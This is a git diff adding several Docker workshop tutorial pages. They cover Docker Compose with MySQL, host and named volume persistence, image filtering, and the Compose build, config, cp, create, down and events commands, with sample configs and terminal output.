0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:apache-buster 2.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => [1/2] FROM docker.io/library/php:apache-buster@sha256:386b6018bd3f73fb8f0bda3d26f76f402c36a68ed9d061b00bd7c080ea1fc951 0.0s + => => resolve docker.io/library/php:apache-buster@sha256:386b6018bd3f73fb8f0bda3d26f76f402c36a68ed9d061b00bd7c080ea1fc951 0.0s + => CACHED [2/2] RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli 0.0s + => exporting to docker image format 1.6s + => => exporting layers 0.0s + => => exporting manifest sha256:a328dcabf983b4d59f41482a80e08861ee4226b2fe131b13a87bae3ff9b86e9c 0.0s + => => exporting config sha256:b38bdd1cd3eabf8ea442587b892d0a0d86e6d54251e1724444208996488da8e6 0.0s + => => sending tarball 1.6s + => importing to docker 0.1s +[+] Running 2/0 + β Ώ Container myphpapp-app Created 0.0s + β Ώ Container myphpapp-db Created 0.0s +Attaching to myphpapp-app, myphpapp-db +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | [Fri Mar 03 19:34:00.799408 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/8.2.3 configured -- resuming normal operations +myphpapp-app | [Fri Mar 03 19:34:00.799469 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql' +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-db | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock' +myphpapp-db | 2023-03-03T19:34:01.423026Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead. 
+myphpapp-db | 2023-03-03T19:34:01.430139Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1 +myphpapp-db | 2023-03-03T19:34:01.437649Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started. +myphpapp-db | 2023-03-03T19:34:01.524024Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended. +myphpapp-db | 2023-03-03T19:34:01.700495Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed. +myphpapp-db | 2023-03-03T19:34:01.700522Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel. +myphpapp-db | 2023-03-03T19:34:01.701509Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. +myphpapp-db | 2023-03-03T19:34:01.711706Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock +myphpapp-db | 2023-03-03T19:34:01.711810Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL. +myphpapp-app | 172.24.0.1 - - [03/Mar/2023:19:34:12 +0000] "GET / HTTP/1.1" 200 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" + +``` + + +### open browser + +http://localhost:8080 \ No newline at end of file diff --git a/content/en/docker/a24.Host-Volume-mount 2.md b/content/en/docker/a24.Host-Volume-mount 2.md new file mode 100644 index 0000000..9349a22 --- /dev/null +++ b/content/en/docker/a24.Host-Volume-mount 2.md @@ -0,0 +1,244 @@ +--- +title: "Host Volume Mount - Data persistentence " +slug: "Host-Volume-Mount-Data-persistentence" +--- + +we already used database with web app but docker containers are ephermal. this means they are losing data once removed or re-started so somewhere need to find data persistent + +create `docker-compose.yml` using following content + +```yml +version: '3' +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + dbclient: + image: mysql:latest + depends_on: + - db + command: mysql -uroot -psomepass -hdb +``` + +MYSQL_DATABASE will create an empty database with the name "somedatabase" at first + +depends_on waits for the container to start on the other containers + + +### run the command + +```bash +5-DC-Host-Vol-mount git:(main) βœ— docker compose up -d +[+] Running 3/3 + β Ώ Network 5-dc-host-vol-mount_default Created 0.1s + β Ώ Container myphpapp-db St... 0.3s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Started 0.5s +``` + +#### check docker compose process + +```sh +5-DC-Host-Vol-mount git:(main) βœ— docker compose ps +NAME IMAGE COMMAND SERVICE CREATED STATUS PORTS +myphpapp-db mysql:latest "docker-entrypoint.s…" db About a minute ago Up About a minute 3306/tcp, 33060/tcp + + +``` + +#### open mariadb shell + +```sh + docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. 
+ +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. +mysql> + +``` +#### enter following SQL queries + +```sh +mysql> USE somedatabase; +Database changed +mysql> SHOW TABLES; +Empty set (0.01 sec) + +``` +#### lets create table +```sh +mysql> CREATE TABLE mytable (id INT) ; +Query OK, 0 rows affected (0.04 sec) + +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.01 sec) +mysql> exit +``` + +#### stop and remove container + +```sh +docker-compose stop +[+] Running 2/2 + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Stopped 0.0s + β Ώ Container myphpapp-db Stopped 1.8s +5-DC-Host-Vol-mount git:(main) βœ— docker-compose rm +? Going to remove 5-dc-host-vol-mount-dbclient-1, myphpapp-db Yes +[+] Running 2/0 + β Ώ Container myphpapp-db Removed 0.0s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Removed 0.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— + +``` +### lets make data persistent even we remove container ? with volumesa nd a host mounded data directory +```sh +mkdir data + +``` +lets update docker-compose.yml + +```yml +version: '3' + +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + volumes: + - ./data:/var/lib/mysql + + dbclient: + image: mysql:latest + depends_on: + - db + command: mysql -uroot -psomepass -hdb +``` + +#### restart docker compose + +```sh + +docker-compose up -d +[+] Running 2/2 + β Ώ Container myphpapp-db Started 0.4s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Started + 0.7s +``` +### recreate table + +```sh +➜ 5-DC-Host-Vol-mount git:(main) βœ— docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. + +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> USE somedatabase; +Database changed +mysql> SHOW TABLES; +Empty set (0.01 sec) + +CREATE TABLE mytable (id INT) ; +Query OK, 0 rows affected (0.04 sec) + +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.00 sec) + +mysql> exit +``` + +#### stop and remove the container + +```sh +5-DC-Host-Vol-mount git:(main) βœ— docker compose stop +[+] Running 2/2 + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Stopped 0.0s + β Ώ Container myphpapp-db Stopped 2.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— docker compose rm +? 
Going to remove 5-dc-host-vol-mount-dbclient-1, myphpapp-db Yes +[+] Running 2/0 + β Ώ Container myphpapp-db Removed 0.0s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Removed 0.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— + +``` +#### lets start db container again + +```sh +docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. + +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> + +``` + +#### lets data is persistent or not + +```sh +USE somedatabase; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.00 sec) + +mysql> exit + +``` \ No newline at end of file diff --git a/content/en/docker/a25.Name-volume-mount 2.md b/content/en/docker/a25.Name-volume-mount 2.md new file mode 100644 index 0000000..f8d95eb --- /dev/null +++ b/content/en/docker/a25.Name-volume-mount 2.md @@ -0,0 +1,97 @@ +--- +title: "Named Volume Mount - Data persistentence " +description: "Named volume sharing data" +slug: "Named-Volume-Mount-Data-persistentence" +--- + +### create volume + +```sh + 6-DC-name-volume git:(main) βœ— docker volume create --name my-vol +my-vol +``` + + +#### create docker-compose.yml with following content + +```yml +version: '3.7' + +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + volumes: + - my-vol:/var/lib/mysql + +volumes: + my-vol: + name: my-vol +``` + +#### run docker compose + +```sh + +docker compose up -d +WARN[0000] volume "my-vol" already exists but was not created by Docker Compose. Use `external: true` to use an existing volume +[+] Running 1/1 + β Ώ Container myphpapp-db Started 0.3s +➜ 6-DC-name-volume git:(main) βœ— + +``` +#### start new container with ubuntu +```sh +docker run -v my-vol:/mydata --rm -it ubuntu /bin/bash +``` + +show the database data files + +```sh +root@1666e5d6f315:/# cd mydata/ +root@1666e5d6f315:/mydata# ls +'#ib_16384_0.dblwr' binlog.000001 client-cert.pem mysql public_key.pem undo_001 +'#ib_16384_1.dblwr' binlog.000002 client-key.pem mysql.ibd server-cert.pem undo_002 +'#innodb_redo' binlog.index ib_buffer_pool mysql.sock server-key.pem +'#innodb_temp' ca-key.pem ibdata1 performance_schema somedatabase + auto.cnf ca.pem ibtmp1 private_key.pem sys +root@1666e5d6f315:/mydata# +root@1666e5d6f315:/mydata# exit +exit +``` + +### share data between two containers? lets try ? 
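A named volume lives outside any single container, so the same volume can be mounted into several containers and they all see the same files. Here is a minimal sketch of the idea (it assumes the `Datastore1` volume that the next step creates); the steps below then do the same thing interactively:

```sh
# both commands mount the same named volume at /mydatastore
docker run --rm -v Datastore1:/mydatastore ubuntu \
  sh -c 'echo "written by the first container" > /mydatastore/shared.txt'

# a second container sees the file written by the first one
docker run --rm -v Datastore1:/mydatastore ubuntu cat /mydatastore/shared.txt
```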
+ +```sh +6-DC-name-volume git:(main) βœ— docker volume create --name Datastore1 +Datastore1 +``` +#### open a shell woth datastore1 in /mydatabase +```sh +docker run -v Datastore1:/mydatastore --rm -it ubuntu /bin/bash +``` +#### write a new text file + +```sh +echo "hello datastore1" > /mydatastore/hello.txt +root@4b119677c00b:/# ls +bin boot dev etc home lib media mnt mydatastore opt proc root run sbin srv sys tmp usr var +root@4b119677c00b:/# cat mydatastore/hello.txt +hello datastore1 +root@4b119677c00b:/# + +``` + +#### add another line + +```sh +root@4b119677c00b:/# echo "\n\nhello datastore 2" >> /mydatastore/hello.txt +root@4b119677c00b:/# cat mydatastore/hello.txt +hello datastore1 +\n\nhello datastore 2 +root@4b119677c00b:/# +``` \ No newline at end of file diff --git a/content/en/docker/a26.docker-compose-build 2.md b/content/en/docker/a26.docker-compose-build 2.md new file mode 100644 index 0000000..f5501e4 --- /dev/null +++ b/content/en/docker/a26.docker-compose-build 2.md @@ -0,0 +1,143 @@ +--- +title: "Docker Compose CLI - Build Command " +description: " Docker Compose Build Command " +slug: "Docker-Compose-CLI-Build-Command" +--- + + +### Docker Compose Build Command + +```sh +docker compose build [OPTIONS] [SERVICE...] + +``` + +If you change a service’s Dockerfile or the contents of its build directory, run docker compose build to rebuild it. + +`--build-arg` Set build-time variables for services.
+`--no-cache` Do not use cache when building the image.
+`--progress auto` Set type of progress output (auto, tty, plain, quiet).
+`--pull` Always attempt to pull a newer version of the image.
+`--push` Push service images.
+`--quiet, -q` Don't print anything to STDOUT.
+`--ssh ` Set SSH authentications used when building .service images. (use β€˜default’ for using your default SSH Agent) + + +#### create dockerfile with following content + + +```dockerfile +# syntax=docker/dockerfile:1 +FROM python:3.7-alpine +WORKDIR /code +ENV FLASK_APP=app.py +ENV FLASK_RUN_HOST=0.0.0.0 +RUN apk add --no-cache gcc musl-dev linux-headers +COPY requirements.txt requirements.txt +RUN pip install -r requirements.txt +EXPOSE 5000 +COPY . . +CMD ["flask", "run"] + +``` + +create app.py with following content + + +```python +import time + +import redis +from flask import Flask + +app = Flask(__name__) +cache = redis.Redis(host='redis', port=6379) + +def get_hit_count(): + retries = 5 + while True: + try: + return cache.incr('hits') + except redis.exceptions.ConnectionError as exc: + if retries == 0: + raise exc + retries -= 1 + time.sleep(0.5) + +@app.route('/') +def hello(): + count = get_hit_count() + return 'Hello World! I have been seen {} times.\n'.format(count) + + +``` + +#### create requirements.txt with following content + + +```txt +flask +redis + +``` + +create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" +``` + +### docker compose build + +```sh + + 7-DC-CLI git:(main) βœ— docker compose build +[+] Building 27.1s (15/15) FINISHED + => [internal] booting buildkit 0.5s + => => starting container buildx_buildkit_great_brahmagupta0 0.5s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 319B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => resolve image config for docker.io/docker/dockerfile:1 3.8s + => docker-image://docker.io/docker/dockerfile:1@sha256:39b85bbfa7536a5feceb7372a0817649ecb2724562a38360f4d6a77 3.1s + => => resolve docker.io/docker/dockerfile:1@sha256:39b85bbfa7536a5feceb7372a0817649ecb2724562a38360f4d6a7782a4 0.0s + => => sha256:9d0cd65540a143ce38aa0be7c5e9efeed30d3580d03667f107cd76354f2bee65 10.82MB / 10.82MB 3.0s + => => extracting sha256:9d0cd65540a143ce38aa0be7c5e9efeed30d3580d03667f107cd76354f2bee65 0.1s + => [internal] load metadata for docker.io/library/python:3.7-alpine 3.6s + => [1/6] FROM docker.io/library/python:3.7-alpine@sha256:c9c2d6f97a00b211def3818830883495417e3b1fd34783ce6135c 3.9s + => => resolve docker.io/library/python:3.7-alpine@sha256:c9c2d6f97a00b211def3818830883495417e3b1fd34783ce6135c 0.0s + => => sha256:57a125a213d772ab0750422ad92f1cc7d1d97e0b09ad4ed766d9cd50db8e2b50 2.88MB / 2.88MB 1.9s + => => sha256:2bd7dfc9c660f2a9be2e537fd8f7f3c289ea1ba335c957472bd9a51630c9b449 230B / 230B 0.6s + => => sha256:6b1178b7c6752e0d2eb293ee14286ec1f75d0f868d9826bcaba24fe33affea99 11.01MB / 11.01MB 3.0s + => => sha256:cdba2f6867522ee9d2e8dcc9b1ad3ec5bafe75da976a3e613ff26cbc98738b48 624.86kB / 624.86kB 3.5s + => => sha256:af6eaf76a39c2d3e7e0b8a0420486e3df33c4027d696c076a99a3d0ac09026af 3.26MB / 3.26MB 0.6s + => => extracting sha256:af6eaf76a39c2d3e7e0b8a0420486e3df33c4027d696c076a99a3d0ac09026af 0.1s + => => extracting sha256:cdba2f6867522ee9d2e8dcc9b1ad3ec5bafe75da976a3e613ff26cbc98738b48 0.1s + => => extracting sha256:6b1178b7c6752e0d2eb293ee14286ec1f75d0f868d9826bcaba24fe33affea99 0.2s + => => extracting sha256:2bd7dfc9c660f2a9be2e537fd8f7f3c289ea1ba335c957472bd9a51630c9b449 0.0s + => => extracting sha256:57a125a213d772ab0750422ad92f1cc7d1d97e0b09ad4ed766d9cd50db8e2b50 0.1s + => [internal] load build context 0.0s + => => transferring context: 1.08kB 0.0s + 
=> [2/6] WORKDIR /code 0.1s + => [3/6] RUN apk add --no-cache gcc musl-dev linux-headers 3.1s + => [4/6] COPY requirements.txt requirements.txt 0.0s + => [5/6] RUN pip install -r requirements.txt 3.1s + => [6/6] COPY . . 0.0s + => exporting to docker image format 5.6s + => => exporting layers 3.4s + => => exporting manifest sha256:198e97700c3c0f4a28b481ceacda99d7dacf2c8f42c86f7f4ffd6e5094098322 0.0s + => => exporting config sha256:dba54b65e3daa61d0ce759dc20145718068c33daf2eaf908c03e03934024df88 0.0s + => => sending tarball 2.2s + => importing to docker 1.4s +➜ 7-DC-CLI git:(main) βœ— + + +``` \ No newline at end of file diff --git a/content/en/docker/a27.docker-compose-config 2.md b/content/en/docker/a27.docker-compose-config 2.md new file mode 100644 index 0000000..be89f44 --- /dev/null +++ b/content/en/docker/a27.docker-compose-config 2.md @@ -0,0 +1,103 @@ +--- +title: "Docker Compose CLI - Config Command" +description: " Parse, resolve and render compose file in canonical format " +slug: "Docker-Compose-CLI-Config-Command" +--- + + +#### create dockerfile with following content + + +```dockerfile +# syntax=docker/dockerfile:1 +FROM python:3.7-alpine +WORKDIR /code +ENV FLASK_APP=app.py +ENV FLASK_RUN_HOST=0.0.0.0 +RUN apk add --no-cache gcc musl-dev linux-headers +COPY requirements.txt requirements.txt +RUN pip install -r requirements.txt +EXPOSE 5000 +COPY . . +CMD ["flask", "run"] + +``` + +#### create app.py with following content + + +```python +import time + +import redis +from flask import Flask + +app = Flask(__name__) +cache = redis.Redis(host='redis', port=6379) + +def get_hit_count(): + retries = 5 + while True: + try: + return cache.incr('hits') + except redis.exceptions.ConnectionError as exc: + if retries == 0: + raise exc + retries -= 1 + time.sleep(0.5) + +@app.route('/') +def hello(): + count = get_hit_count() + return 'Hello World! I have been seen {} times.\n'.format(count) + + +``` + +#### create requirements.txt fil with following content + + +```sh +flask +redis + +``` + +#### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . 
+ ports: + - "8000:5000" + redis: + image: "redis:alpine" +``` + +### docker compose config + +```sh +7-DC-CLI git:(main) βœ— docker compose config +name: 7-dc-cli +services: + redis: + image: redis:alpine + networks: + default: null + web: + build: + context: /Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/7-DC-CLI + dockerfile: Dockerfile + networks: + default: null + ports: + - mode: ingress + target: 5000 + published: "8000" + protocol: tcp +networks: + default: + name: 7-dc-cli_default +``` \ No newline at end of file diff --git a/content/en/docker/a28.docker-compose-cp 2.md b/content/en/docker/a28.docker-compose-cp 2.md new file mode 100644 index 0000000..adc6ce2 --- /dev/null +++ b/content/en/docker/a28.docker-compose-cp 2.md @@ -0,0 +1,84 @@ +--- +title: "Docker Compose CLI - CP Command " +description: " Copy files/folders between a service container and the local filesystem " +slug: "Docker-Compose-CLI-CP-Command" +--- + +### Copy files/folders between a service container and the local filesystem + +```sh +# Syntax to Copy from Container to Docker Host +docker cp {options} CONTAINER:SRC_PATH DEST_PATH +# Syntax to Copy from Docker Host to Container +docker cp {options} SRC_PATH CONTAINER:DEST_PATH + +``` + +#### lets run ngnix container + +```yml +version: '3' +services: + web: + image: nginx:latest + +``` + +#### run docker compose up + +```sh +docker compose -f docker-compose-ngnix.yml up + +``` + +### check running container + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +008940fdbed8 nginx:latest "/docker-entrypoint.…" 29 seconds ago Up 28 seconds 80/tcp 7-dc-cli-web-1 +``` + +### create index.html + +```sh + + Docker-Compose git:(main) βœ— cd 7-DC-CLI +➜ 7-DC-CLI git:(main) βœ— ls +Dockerfile app.py docker-compose-ngnix.yml docker-compose.yml index.html requirements.txt src +``` +### copy index.html + +```sh +$ docker-compose cp index.html web:/usr/share/nginx/html/ + +``` + + +``` +services: + web: + image: nginx + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - "80:80" + command: nginx-debug -g 'daemon off;' + copy: + - ./index.html:/usr/share/nginx/html/index.html +``` + +``` +services: + web: + image: nginx + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - "80:80" + command: nginx-debug -g 'daemon off;' + copy: + - ./index.html:/usr/share/nginx/html/index.html + - ./style.css:/usr/share/nginx/html/style.css + - ./images:/usr/share/nginx/html/images +``` diff --git a/content/en/docker/a29.docker-compose-create 2.md b/content/en/docker/a29.docker-compose-create 2.md new file mode 100644 index 0000000..b07cc96 --- /dev/null +++ b/content/en/docker/a29.docker-compose-create 2.md @@ -0,0 +1,41 @@ +--- +title: "Docker Compose CLI - Create Command " +description: " Creates containers for a service. " +slug: "Docker-Compose-CLI-Create-Command" +--- + + +### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" + +``` + + +### Creates containers for a service. 
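`docker compose create` prepares the project without running it: images are pulled or built and the service containers are created, but they stay in the `Created` state until you start them. A rough sketch of how it is usually combined with the related commands:

```sh
docker compose create   # create the service containers, but do not start them
docker compose start    # start the containers created above
docker compose ps -a    # -a also lists containers that are created but not running
```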
+ +```sh +➜ 7-DC-CLI git:(main) βœ— docker compose create +[+] Running 7/7 + β Ώ redis Pulled 6.1s + β Ώ af6eaf76a39c Already exists 0.0s + β Ώ 5015c79ed515 Pull complete 0.9s + β Ώ 2ca28624189f Pull complete 1.0s + β Ώ 4691452befb1 Pull complete 1.6s + β Ώ 746fa87aff8c Pull complete 2.1s + β Ώ b8496ad2d107 Pull complete 2.2s +WARN[0006] Found orphan containers ([7-dc-cli-client-1]) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up. +[+] Running 2/2 + β Ώ Container 7-dc-cli-redis-1 Created 0.1s + β Ώ Container 7-dc-cli-web-1 Recreated 0.1s +➜ 7-DC-CLI git:(main) βœ— + +``` \ No newline at end of file diff --git a/content/en/docker/a3.docker-images-filter 2.md b/content/en/docker/a3.docker-images-filter 2.md new file mode 100644 index 0000000..6333413 --- /dev/null +++ b/content/en/docker/a3.docker-images-filter 2.md @@ -0,0 +1,62 @@ +--- +title: "Docker Image Filtering" +slug: Docker-Image-Filtering +--- + +running `docker run alpine ` command would download the Alpine Linux image from Docker Hub and start a new container based on that image. You can then use the container to run commands or applications. When you exit the container, it will stop running. + +Alpine Linux is a lightweight Linux distribution that is commonly used in Docker containers due to its small size and security features. + +```sh +dockerworkshop git:(main) βœ— docker pull alpine:3.6 +docker pull alpine:3.7 +docker pull alpine:3.8 +docker pull alpine:3.9 +3.6: Pulling from library/alpine +e8f81692e76c: Pull complete +Digest: sha256:66790a2b79e1ea3e1dabac43990c54aca5d1ddf268d9a5a0285e4167c8b24475 +Status: Downloaded newer image for alpine:3.6 +docker.io/library/alpine:3.6 +3.7: Pulling from library/alpine +40223db5366f: Pull complete +Digest: sha256:8421d9a84432575381bfabd248f1eb56f3aa21d9d7cd2511583c68c9b7511d10 +Status: Downloaded newer image for alpine:3.7 +docker.io/library/alpine:3.7 +3.8: Pulling from library/alpine +788aef77d06b: Pull complete +Digest: sha256:2bb501e6173d9d006e56de5bce2720eb06396803300fe1687b58a7ff32bf4c14 +Status: Downloaded newer image for alpine:3.8 +docker.io/library/alpine:3.8 +3.9: Pulling from library/alpine +941f399634ec: Pull complete +Digest: sha256:414e0518bb9228d35e4cd5165567fb91d26c6a214e9c95899e1e056fcd349011 +Status: Downloaded newer image for alpine:3.9 +docker.io/library/alpine:3.9 + +``` + +#### docker images filtering + +The docker images command allows you to filter Docker images based on various criteria using the --filter option. Here are some common filters that you can use with the docker images command: + + +```sh +docker images --filter=reference='alpine' +REPOSITORY TAG IMAGE ID CREATED SIZE +alpine 3.9 9afdd4a290bf 2 years ago 5.3MB +alpine 3.8 b22edbe95d11 3 years ago 4.2MB +alpine 3.7 bd812700d284 3 years ago 4.01MB +alpine 3.6 25e814211fdd 3 years ago 3.84MB +``` +#### Filters images that are or are not "dangling," meaning they are not tagged and not referenced by any container. 
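Dangling images usually pile up after you rebuild the same tag again and again: the old layers lose their tag but stay on disk. To see only those images, or to clean them up afterwards, something like the following should work; the existing example below uses `dangling=false` for the opposite view:

```sh
# show only untagged (dangling) images
docker images --filter dangling=true

# remove all dangling images
docker image prune
```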
+ +```sh +docker images --filter dangling=false +``` +Or to list images created before a specific image, you can run: + +```sh +docker images --filter before=alpine:3.8 + +``` + diff --git a/content/en/docker/a30.docker-compose-down 2.md b/content/en/docker/a30.docker-compose-down 2.md new file mode 100644 index 0000000..acea744 --- /dev/null +++ b/content/en/docker/a30.docker-compose-down 2.md @@ -0,0 +1,60 @@ +--- +title: "Docker Compose CLI - Down Command " +description: " Stop and remove containers, networks " +slug: "Docker-Compose-CLI-Down-Command" +--- + + + +### create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" + +``` + + +### Create docker compose up + +```sh + + docker compose up +WARN[0000] Found orphan containers ([7-dc-cli-client-1]) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up. +Attaching to 7-dc-cli-redis-1, 7-dc-cli-web-1 +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +7-dc-cli-redis-1 | 1:C 04 Mar 2023 14:23:46.156 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.157 * monotonic clock: POSIX clock_gettime +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.158 * Running mode=standalone, port=6379. +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.158 # Server initialized +7-dc-cli-redis-1 | 1:M 04 Mar 2023 14:23:46.160 * Ready to accept connections +7-dc-cli-web-1 | * Serving Flask app 'app.py' +7-dc-cli-web-1 | * Debug mode: off +7-dc-cli-web-1 | WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. +7-dc-cli-web-1 | * Running on all addresses (0.0.0.0) +7-dc-cli-web-1 | * Running on http://127.0.0.1:5000 +7-dc-cli-web-1 | * Running on http://172.18.0.3:5000 +7-dc-cli-web-1 | Press CTRL+C to quit + + +``` + +### Create docker compose Down + +```sh + 7-DC-CLI git:(main) βœ— docker compose down +[+] Running 3/3 + β Ώ Container 7-dc-cli-redis-1 Removed 0.2s + β Ώ Container 7-dc-cli-web-1 Removed 10.2s + β Ώ Network 7-dc-cli_default Removed 0.1s +➜ 7-DC-CLI git:(main) βœ— + + +``` \ No newline at end of file diff --git a/content/en/docker/a31.docker-compose-events 2.md b/content/en/docker/a31.docker-compose-events 2.md new file mode 100644 index 0000000..ff64c00 --- /dev/null +++ b/content/en/docker/a31.docker-compose-events 2.md @@ -0,0 +1,366 @@ +--- +title: "Docker Compose CLI - Events Command " +description: " Receive real time events from containers. " +slug: "Docker-Compose-CLI-Events-Command" +--- + + +#### here is sample voting app + +```sh +cat docker-compose.yml +# version is now using "compose spec" +# v2 and v3 are now combined! 
+# docker-compose v1.27+ required + +services: + vote: + build: ./vote + # use python rather than gunicorn for local dev + command: python app.py + depends_on: + redis: + condition: service_healthy + healthcheck: + test: ["CMD", "curl", "-f", "http://localhost"] + interval: 15s + timeout: 5s + retries: 3 + start_period: 10s + volumes: + - ./vote:/app + ports: + - "5000:80" + networks: + - front-tier + - back-tier + + result: + build: ./result + # use nodemon rather than node for local dev + entrypoint: nodemon server.js + depends_on: + db: + condition: service_healthy + volumes: + - ./result:/app + ports: + - "5001:80" + - "5858:5858" + networks: + - front-tier + - back-tier + + worker: + build: + context: ./worker + depends_on: + redis: + condition: service_healthy + db: + condition: service_healthy + networks: + - back-tier + + redis: + image: redis:alpine + volumes: + - "./healthchecks:/healthchecks" + healthcheck: + test: /healthchecks/redis.sh + interval: "5s" + networks: + - back-tier + + db: + image: postgres:15-alpine + environment: + POSTGRES_USER: "postgres" + POSTGRES_PASSWORD: "postgres" + volumes: + - "db-data:/var/lib/postgresql/data" + - "./healthchecks:/healthchecks" + healthcheck: + test: /healthchecks/postgres.sh + interval: "5s" + networks: + - back-tier + + # this service runs once to seed the database with votes + # it won't run unless you specify the "seed" profile + # docker compose --profile seed up -d + seed: + build: ./seed-data + profiles: ["seed"] + depends_on: + vote: + condition: service_healthy + networks: + - front-tier + restart: "no" + +volumes: + db-data: + +networks: + front-tier: + back-tier: + + + + +``` + + +#### Docker 